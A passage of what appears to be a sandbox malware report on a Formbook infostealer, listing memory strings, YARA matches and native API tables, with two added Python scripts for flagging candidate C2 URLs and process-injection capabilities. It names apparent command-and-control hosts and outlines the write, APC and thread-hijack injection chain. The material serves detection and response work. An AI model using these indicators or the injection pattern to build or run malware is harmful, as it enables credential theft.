Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://hm.baidu.com/hm.js?
Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
            Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
            Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
            Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2h
            Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfQ
            Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: findstr.exe, 00000007.00000003.2520276379.0000000008026000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://track.uc.cn/collect
            Source: findstr.exe, 00000007.00000002.3926054651.00000000041F6000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000003876000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2627811818.0000000028C66000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://valerieomage.com/c7rq?k06T=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl
            Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: findstr.exe, 00000007.00000002.3926054651.000000000451A000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000003B9A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.kosherphonestore.com/ktbm/?k06T=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkji
            Source: findstr.exe, 00000007.00000002.3926054651.0000000004B62000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.00000000041E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.siteblogoficialon.com/xti2/?k06T=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8
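The string rows above mix URLs that any browser or Windows sign-in component carries (search-provider favicon and suggestion templates, login.live.com OAuth endpoints, CDN and analytics scripts) with three URLs that share nothing except the query key k06T, reused on unrelated hosts under a short path with a long opaque value. Note also that binary string dumps glue neighbouring URLs together (".../favicon.icohttps://www.ecosia.org/..."), which a naive URL regex will swallow as one URL. The script below is an added example, not part of the Joe Sandbox report: it parses a constructed subset of the rows above, splits glued URLs, and groups single-key, long-value URLs by query key so that a key spanning several hosts stands out. The "one query key with a long opaque value" heuristic is this example's own assumption, not a documented property of the family.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed subset of the "String found in binary or memory" rows above.
# Only the URL part is used; the memory-dump identifiers are shortened.
REPORT_ROWS = [
    "Source: findstr.exe, 00000007 | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=",
    "Source: findstr.exe, 00000007 | String found in binary or memory: https://duckduckgo.com/ac/?q=",
    "Source: findstr.exe, 00000007 | String found in binary or memory: https://hm.baidu.com/hm.js?",
    "Source: findstr.exe, 00000007 | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:",
    "Source: findstr.exe, 00000007 | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033",
    "Source: findstr.exe, 00000007 | String found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark",
    "Source: findstr.exe, 00000007, firefox.exe, 0000000B | String found in binary or memory: https://valerieomage.com/c7rq?k06T=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl",
    "Source: findstr.exe, 00000007 | String found in binary or memory: https://www.kosherphonestore.com/ktbm/?k06T=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkji",
    "Source: findstr.exe, 00000007 | String found in binary or memory: https://www.siteblogoficialon.com/xti2/?k06T=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8",
]

# A URL runs until whitespace/quotes or until the next scheme: the negative
# lookahead is what splits two URLs that the string dump glued together.
URL_RE = re.compile(r"https?://(?:(?!https?://)[^\s\"'<>])+")


def extract_urls(rows):
    """Every URL in every row, in order, with glued pairs split apart."""
    return [url for row in rows for url in URL_RE.findall(row)]


def looks_like_beacon(url, min_value_len=20):
    """Heuristic (an assumption of this example): exactly one query parameter
    whose value is a long opaque token. OAuth and search URLs carry several
    short named parameters, and blank 'q=' templates carry none, so both drop out."""
    params = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    if len(params) != 1:
        return False
    _, value = params[0]
    return len(value) >= min_value_len and re.fullmatch(r"[A-Za-z0-9+/=_-]+", value) is not None


def candidate_c2(rows, min_hosts=2):
    """Group beacon-like URLs by query key. One key reused on several unrelated
    hosts is the shape a config with a list of decoy and real C2 domains produces.
    Returns {key: sorted hostnames} for keys seen on at least min_hosts hosts."""
    hosts_by_key = defaultdict(set)
    for url in extract_urls(rows):
        if looks_like_beacon(url):
            parts = urlsplit(url)
            key = parse_qsl(parts.query, keep_blank_values=True)[0][0]
            hosts_by_key[key].add(parts.hostname)
    return {key: sorted(hosts) for key, hosts in hosts_by_key.items() if len(hosts) >= min_hosts}


if __name__ == "__main__":
    for key, hosts in candidate_c2(REPORT_ROWS).items():
        print(f"query key {key!r} reused on {len(hosts)} hosts: {', '.join(hosts)}")
```

Run against the full string table rather than the subset, the same three hosts are the only hits; everything else either has no query, several named parameters, or a short value. Treat the output as a triage list to confirm against the report's DNS and HTTP sections, not as a verdict: a CDN that reuses one opaque cache-busting key across hosts would trip the same heuristic.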

            E-Banking Fraud

Source: Yara match | File source: 4.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3924270486.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3925169217.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3924150933.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3925057114.0000000002AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2294356055.0000000005CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

Source: 4.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 4.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3924270486.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.3925169217.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3924150933.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.3925057114.0000000002AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.2294356055.0000000005CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0042B593 NtClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C35C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C2DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C2C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C2B60 NtClose,LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C4650 NtSuspendThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C3090 NtSetValueKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C3010 NtOpenDirectoryObject
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C4340 NtSetContextThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C2DB0 NtEnumerateKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C2DD0 NtDelayExecution
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C2D00 NtSetInformationFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C3D10 NtOpenProcessToken
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C2D10 NtMapViewOfSection
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C2D30 NtUnmapViewOfSection
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C3D70 NtOpenThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C2CA0 NtQueryInformationToken
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C2CC0 NtQueryVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C2CF0 NtOpenProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C2C00 NtQueryInformationProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C2C60 NtCreateKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C2F90 NtProtectVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C2FA0 NtQuerySection
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C2FB0 NtResumeThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C2FE0 NtCreateFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C2F30 NtCreateSection
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C2F60 NtCreateProcessEx
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C2E80 NtReadVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C2EA0 NtAdjustPrivilegesToken
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C2EE0 NtQueueApcThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C2E30 NtWriteVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C39B0 NtGetContextThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C2B80 NtQueryInformationFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C2BA0 NtEnumerateValueKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C2BE0 NtQueryValueKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C2BF0 NtAllocateVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C2AB0 NtWaitForSingleObject
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C2AD0 NtReadFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C2AF0 NtWriteFile
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C4340 NtSetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C4650 NtSuspendThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C35C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C2B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C2AF0 NtWriteFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C2AD0 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C39B0 NtGetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C2F30 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C2FE0 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C2FB0 NtResumeThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C2EE0 NtQueueApcThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C2D30 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C2D10 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C2DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C2DD0 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C2C60 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C2C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C2CA0 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C3010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C3090 NtSetValueKey
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C2BE0 NtQueryValueKey
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C2BF0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C2BA0 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C2B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C2AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C2F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C2FA0 NtQuerySection
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C2F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C2E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C2EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C2E80 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C3D70 NtOpenThread
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C2D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C3D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C2DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C2C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C2CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_036C2CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_02E68090 NtClose
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_02E68000 NtDeleteFile
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_02E67F20 NtReadFile
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_02E67DC0 NtCreateFile
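The two runs of Nt* entries above deserve a side-by-side read. ngen.exe (analysis slot 4) carries its table at 058C2xxx-058C4xxx and findstr.exe (slot 7) at 036C2xxx-036C4xxx, and each API sits at the same low-order offset in both: NtWriteVirtualMemory at ...2E30, NtQueueApcThread at ...2EE0, NtSetContextThread at ...4340, NtMapViewOfSection at ...2D10. That is one payload carrying its own native-call table, relocated and planted in two host processes, and the set of calls it carries covers every step of writing into another process and hijacking a thread in it. The script below is an added example, not part of the Joe Sandbox report: it parses a constructed subset of these "Code function" rows, checks per process which injection primitive sets are complete, and confirms the shared offsets across the two processes. The primitive groupings and the 64 KiB-region assumption behind the offset comparison are this example's own, not Joe Sandbox's.

```python
import re
from collections import defaultdict

# Constructed subset of the "Code function" rows above, kept in the raw fused form
# "<slot>_<run>_<addr> <api>,<api>,<reference>" exactly as the report prints them.
# Slot 4 is ngen.exe, slot 7 is findstr.exe; the source path is abbreviated.
CODE_FUNCTION_ROWS = [
    "Source: ngen.exe Code function: 4_2_0042B593 NtClose,4_2_0042B593",
    "Source: ngen.exe Code function: 4_2_058C2B60 NtClose,LdrInitializeThunk,4_2_058C2B60",
    "Source: ngen.exe Code function: 4_2_058C3D70 NtOpenThread,4_2_058C3D70",
    "Source: ngen.exe Code function: 4_2_058C2BF0 NtAllocateVirtualMemory,4_2_058C2BF0",
    "Source: ngen.exe Code function: 4_2_058C2E30 NtWriteVirtualMemory,4_2_058C2E30",
    "Source: ngen.exe Code function: 4_2_058C2EE0 NtQueueApcThread,4_2_058C2EE0",
    "Source: ngen.exe Code function: 4_2_058C39B0 NtGetContextThread,4_2_058C39B0",
    "Source: ngen.exe Code function: 4_2_058C4340 NtSetContextThread,4_2_058C4340",
    "Source: ngen.exe Code function: 4_2_058C4650 NtSuspendThread,4_2_058C4650",
    "Source: ngen.exe Code function: 4_2_058C2FB0 NtResumeThread,4_2_058C2FB0",
    "Source: ngen.exe Code function: 4_2_058C2F30 NtCreateSection,4_2_058C2F30",
    "Source: ngen.exe Code function: 4_2_058C2D10 NtMapViewOfSection,4_2_058C2D10",
    "Source: ngen.exe Code function: 4_2_058C2D30 NtUnmapViewOfSection,4_2_058C2D30",
    "Source: findstr.exe Code function: 7_2_02E68090 NtClose,7_2_02E68090",
    "Source: findstr.exe Code function: 7_2_02E68000 NtDeleteFile,7_2_02E68000",
    "Source: findstr.exe Code function: 7_2_036C2B60 NtClose,LdrInitializeThunk,7_2_036C2B60",
    "Source: findstr.exe Code function: 7_2_036C3D70 NtOpenThread,7_2_036C3D70",
    "Source: findstr.exe Code function: 7_2_036C2BF0 NtAllocateVirtualMemory,7_2_036C2BF0",
    "Source: findstr.exe Code function: 7_2_036C2E30 NtWriteVirtualMemory,7_2_036C2E30",
    "Source: findstr.exe Code function: 7_2_036C2EE0 NtQueueApcThread,LdrInitializeThunk,7_2_036C2EE0",
    "Source: findstr.exe Code function: 7_2_036C39B0 NtGetContextThread,LdrInitializeThunk,7_2_036C39B0",
    "Source: findstr.exe Code function: 7_2_036C4340 NtSetContextThread,LdrInitializeThunk,7_2_036C4340",
    "Source: findstr.exe Code function: 7_2_036C4650 NtSuspendThread,LdrInitializeThunk,7_2_036C4650",
    "Source: findstr.exe Code function: 7_2_036C2FB0 NtResumeThread,LdrInitializeThunk,7_2_036C2FB0",
    "Source: findstr.exe Code function: 7_2_036C2F30 NtCreateSection,LdrInitializeThunk,7_2_036C2F30",
    "Source: findstr.exe Code function: 7_2_036C2D10 NtMapViewOfSection,LdrInitializeThunk,7_2_036C2D10",
    "Source: findstr.exe Code function: 7_2_036C2D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_036C2D30",
]

# The API list must start with a letter, so the numeric reference id that the
# report glues onto the end (",4_2_...") is never swallowed into the list. The
# pattern also accepts rows whose reference was separated with " | ".
ROW_RE = re.compile(
    r"Code function: (\d+)_(\d+)_([0-9A-Fa-f]+) ([A-Za-z][A-Za-z0-9]*(?:,[A-Za-z][A-Za-z0-9]*)*)"
)

# Primitive sets are this example's own grouping of well-known injection steps.
INJECTION_PRIMITIVES = {
    "remote write + APC queue": {"NtOpenThread", "NtAllocateVirtualMemory", "NtWriteVirtualMemory", "NtQueueApcThread"},
    "thread context hijack": {"NtSuspendThread", "NtGetContextThread", "NtSetContextThread", "NtResumeThread"},
    "section remap / hollowing": {"NtCreateSection", "NtMapViewOfSection", "NtUnmapViewOfSection", "NtWriteVirtualMemory"},
}


def parse_rows(rows):
    """-> [(slot, address, [Nt* names])]; LdrInitializeThunk and other non-Nt names are dropped."""
    parsed = []
    for row in rows:
        m = ROW_RE.search(row)
        if m:
            slot, _run, addr, apis = m.groups()
            parsed.append((int(slot), int(addr, 16), [a for a in apis.split(",") if a.startswith("Nt")]))
    return parsed


def capability_profile(rows):
    """Per slot, the primitive sets for which every required Nt* call is present."""
    apis_by_slot = defaultdict(set)
    for slot, _addr, nt_apis in parse_rows(rows):
        apis_by_slot[slot].update(nt_apis)
    return {slot: sorted(name for name, needed in INJECTION_PRIMITIVES.items() if needed <= apis)
            for slot, apis in sorted(apis_by_slot.items())}


def stub_offsets(rows, slot):
    """Nt* API -> set of offsets inside a 64 KiB region (addr & 0xFFFF).
    Assumption: the call table lives in one VirtualAlloc'd region, whose base is
    64 KiB aligned, so the offset survives the payload being loaded elsewhere."""
    offsets = defaultdict(set)
    for s, addr, nt_apis in parse_rows(rows):
        if s == slot:
            for api in nt_apis:
                offsets[api].add(addr & 0xFFFF)
    return offsets


def shared_stub_table(rows, slot_a, slot_b):
    """(api, offset) pairs found at the same in-region offset in both processes."""
    a, b = stub_offsets(rows, slot_a), stub_offsets(rows, slot_b)
    return sorted((api, off) for api in a.keys() & b.keys() for off in a[api] & b[api])


if __name__ == "__main__":
    for slot, primitives in capability_profile(CODE_FUNCTION_ROWS).items():
        print(f"slot {slot}: {', '.join(primitives) or 'no complete primitive set'}")
    for api, off in shared_stub_table(CODE_FUNCTION_ROWS, 4, 7):
        print(f"  {api:<24} at +0x{off:04X} in both slot 4 and slot 7")
```

The offset match is the useful part for a responder: NtClose at 0042B593 in ngen.exe and at 02E68090 in findstr.exe do not pair up (those are other code in each process), while all twelve entries of the relocated table do, so the same fingerprint can be used to recognise the payload in any further process it is injected into, regardless of load address.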
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 0_2_00007FF658583480
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 0_2_00007FF658581D80
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 0_2_00007FF65856D1F0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 0_2_00007FF658556AA0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 0_2_00007FF658563AC0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 0_2_00007FF65855B2C0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 0_2_00007FF65857C3A0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 0_2_00007FF6585863B0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 0_2_00007FF658571384
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 0_2_00007FF65855BB60
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 0_2_00007FF65858E4B0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 0_2_00007FF658585490
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 0_2_00007FF65857BC70
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 0_2_00007FF658561C50
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 0_2_00007FF658562D00
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 0_2_00007FF6585535A0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 0_2_00007FF658582DB0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 0_2_00007FF658586D80
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 0_2_00007FF658582580
